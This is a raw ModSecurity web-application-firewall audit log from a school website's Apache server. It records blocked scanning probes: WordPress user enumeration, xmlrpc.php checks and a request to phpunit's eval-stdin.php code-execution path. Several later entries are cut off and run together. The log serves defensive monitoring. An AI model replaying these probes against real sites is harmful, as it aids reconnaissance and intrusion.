271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746816884675749 3353 (- - -) Stopwatch2: 1746816884675749 3353; combined=1484, p1=491, p2=953, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1604d43-Z-- --af84b342-A-- [10/May/2025:01:56:16 +0700] aB5P0C-fAO47ojYKsMr6eAAAAFg 103.236.140.4 59208 103.236.140.4 8181 --af84b342-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --af84b342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af84b342-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746816976450190 2846 (- - -) Stopwatch2: 1746816976450190 2846; combined=1276, p1=432, p2=816, p3=0, p4=0, p5=28, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af84b342-Z-- --d78c2f3b-A-- [10/May/2025:01:56:22 +0700] aB5P1h6q_ZMebht3q14lTQAAAJc 103.236.140.4 59212 103.236.140.4 8181 --d78c2f3b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d78c2f3b-C-- demo.sayHello --d78c2f3b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d78c2f3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746816982318877 6463 (- - -) Stopwatch2: 1746816982318877 6463; combined=4691, p1=607, p2=3846, p3=37, p4=42, p5=95, sr=78, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d78c2f3b-Z-- --6e4c0b71-A-- [10/May/2025:01:57:04 +0700] aB5QAB6q_ZMebht3q14lUAAAAIU 103.236.140.4 59220 103.236.140.4 8181 --6e4c0b71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6e4c0b71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e4c0b71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817024455990 2889 (- - -) Stopwatch2: 1746817024455990 2889; combined=1307, p1=465, p2=812, p3=0, p4=0, p5=30, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e4c0b71-Z-- --1e15b10b-A-- [10/May/2025:01:57:11 +0700] aB5QBy-fAO47ojYKsMr6eQAAAEA 103.236.140.4 59224 103.236.140.4 8181 --1e15b10b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e15b10b-C-- demo.sayHello --1e15b10b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e15b10b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817031436802 4456 (- - -) Stopwatch2: 1746817031436802 4456; combined=3136, p1=469, p2=2504, p3=25, p4=29, p5=65, sr=58, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e15b10b-Z-- --e505e142-A-- [10/May/2025:01:57:16 +0700] aB5QDB6q_ZMebht3q14lVAAAAIE 103.236.140.4 59232 103.236.140.4 8181 --e505e142-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e505e142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e505e142-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817036210640 2056 (- - -) Stopwatch2: 1746817036210640 2056; combined=986, p1=337, p2=621, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e505e142-Z-- --440bf318-A-- [10/May/2025:01:57:24 +0700] aB5QFFoC-7ITMWTA_c9fpgAAAMs 103.236.140.4 59236 103.236.140.4 8181 --440bf318-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --440bf318-C-- demo.sayHello --440bf318-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --440bf318-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817044916598 4954 (- - -) Stopwatch2: 1746817044916598 4954; combined=3902, p1=479, p2=3128, p3=30, p4=29, p5=132, sr=68, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --440bf318-Z-- --df195d31-A-- [10/May/2025:01:58:19 +0700] aB5QS1oC-7ITMWTA_c9fqAAAANE 103.236.140.4 59306 103.236.140.4 8181 --df195d31-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --df195d31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df195d31-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817099694346 2134 (- - -) Stopwatch2: 1746817099694346 2134; combined=1074, p1=368, p2=672, p3=0, p4=0, p5=34, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df195d31-Z-- --995f6c74-A-- [10/May/2025:01:58:27 +0700] aB5QU1oC-7ITMWTA_c9fqgAAANc 103.236.140.4 59390 103.236.140.4 8181 --995f6c74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.173.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.173.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --995f6c74-C-- demo.sayHello --995f6c74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --995f6c74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817107266113 5524 (- - -) Stopwatch2: 1746817107266113 5524; combined=4535, p1=569, p2=3519, p3=34, p4=35, p5=204, sr=77, sw=174, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --995f6c74-Z-- --0b8a392d-A-- [10/May/2025:01:59:10 +0700] aB5QflqQ1nOVx9fWpZSx8gAAAAw 103.236.140.4 59668 103.236.140.4 8181 --0b8a392d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0b8a392d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b8a392d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817150845494 2967 (- - -) Stopwatch2: 1746817150845494 2967; combined=1358, p1=458, p2=870, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b8a392d-Z-- --6674307c-A-- [10/May/2025:01:59:19 +0700] aB5Qh1qQ1nOVx9fWpZSx9AAAABQ 103.236.140.4 59672 103.236.140.4 8181 --6674307c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6674307c-C-- demo.sayHello --6674307c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6674307c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817159018082 6493 (- - -) Stopwatch2: 1746817159018082 6493; combined=4787, p1=588, p2=3894, p3=39, p4=43, p5=128, sr=74, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6674307c-Z-- --bac3e118-A-- [10/May/2025:02:00:22 +0700] aB5QxVqQ1nOVx9fWpZSx-AAAABc 103.236.140.4 59686 103.236.140.4 8181 --bac3e118-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bac3e118-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bac3e118-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817221996857 3226 (- - -) Stopwatch2: 1746817221996857 3226; combined=1358, p1=487, p2=834, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bac3e118-Z-- --22ae172c-A-- [10/May/2025:02:00:28 +0700] aB5QzFoC-7ITMWTA_c9gFAAAAMw 103.236.140.4 59690 103.236.140.4 8181 --22ae172c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --22ae172c-C-- demo.sayHello --22ae172c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --22ae172c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817228180607 7506 (- - -) Stopwatch2: 1746817228180607 7506; combined=5834, p1=731, p2=4816, p3=50, p4=67, p5=102, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22ae172c-Z-- --3073bf14-A-- [10/May/2025:02:03:01 +0700] aB5RZS-fAO47ojYKsMr64gAAAEk 103.236.140.4 59708 103.236.140.4 8181 --3073bf14-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3073bf14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3073bf14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746817381520460 2486 (- - -) Stopwatch2: 1746817381520460 2486; combined=947, p1=326, p2=589, p3=0, p4=0, p5=32, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3073bf14-Z-- --4ce57e34-A-- [10/May/2025:02:03:06 +0700] aB5Rai-fAO47ojYKsMr65AAAAE8 103.236.140.4 59712 103.236.140.4 8181 --4ce57e34-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ce57e34-C-- demo.sayHello --4ce57e34-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ce57e34-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746817386394176 6150 (- - -) Stopwatch2: 1746817386394176 6150; combined=4423, p1=579, p2=3665, p3=34, p4=34, p5=67, sr=81, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ce57e34-Z-- --e67c854d-A-- [10/May/2025:02:57:10 +0700] aB5eFi-fAO47ojYKsMr7BAAAAFc 103.236.140.4 59980 103.236.140.4 8181 --e67c854d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 131.72.196.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 131.72.196.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e67c854d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e67c854d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746820630206644 3059 (- - -) Stopwatch2: 1746820630206644 3059; combined=1366, p1=463, p2=872, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e67c854d-Z-- --e65c792b-A-- [10/May/2025:03:10:32 +0700] aB5hOFqQ1nOVx9fWpZSyHAAAAAk 103.236.140.4 60078 103.236.140.4 8181 --e65c792b-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.230.252.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.230.252.236 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --e65c792b-C-- --e65c792b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e65c792b-E-- --e65c792b-H-- Message: Access denied with code 403 (phase 2). String match " --01bd1b37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01bd1b37-E-- --01bd1b37-H-- Message: Access denied with code 403 (phase 2). String match " --04d90325-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04d90325-E-- --04d90325-H-- Message: Access denied with code 403 (phase 2). String match " --3d2bbb64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d2bbb64-H-- Message: Access denied with code 403 (phase 2). String match " --3836bd52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3836bd52-E-- --3836bd52-H-- Message: Access denied with code 403 (phase 2). String match " --70501903-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70501903-E-- --70501903-H-- Message: Access denied with code 403 (phase 2). 
String match " --6cc78f76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cc78f76-H-- Message: Access denied with code 403 (phase 2). String match " --efe2eb2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --efe2eb2f-E-- --efe2eb2f-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --04b72b39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --04b72b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 